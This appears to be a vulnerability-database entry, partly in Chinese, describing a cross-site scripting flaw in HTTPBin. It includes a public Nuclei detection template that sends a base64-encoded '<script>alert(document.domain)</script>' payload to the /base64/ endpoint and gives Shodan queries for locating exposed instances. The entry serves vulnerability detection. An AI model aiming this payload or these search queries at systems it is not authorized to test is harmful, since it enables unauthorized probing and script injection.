httpbin-xss: HTTPBin - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: HTTPBin | POC: 已公开

漏洞描述

HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: httpbin-xss

info:
  name: HTTPBin - Cross-Site Scripting
  author: Adam Crosser
  severity: high
  description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/postmanlabs/httpbin
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
    shodan-query:
      - html:"https://github.com/requests/httpbin"
      - title:"httpbin.org"
  tags: xss,httpbin,oss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '^<script>alert\(document.domain\)</script>$'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bca459e55c73cb6e7e0048a46e99c6cc3f9e4e8b4859f747f315a58d06ea19100221009bd5c107f9b3caed3649dc59468226d916ed13c3675128c76d46feecbbbbf066:922c64590222798bb761d5b6d8e72950

相关漏洞推荐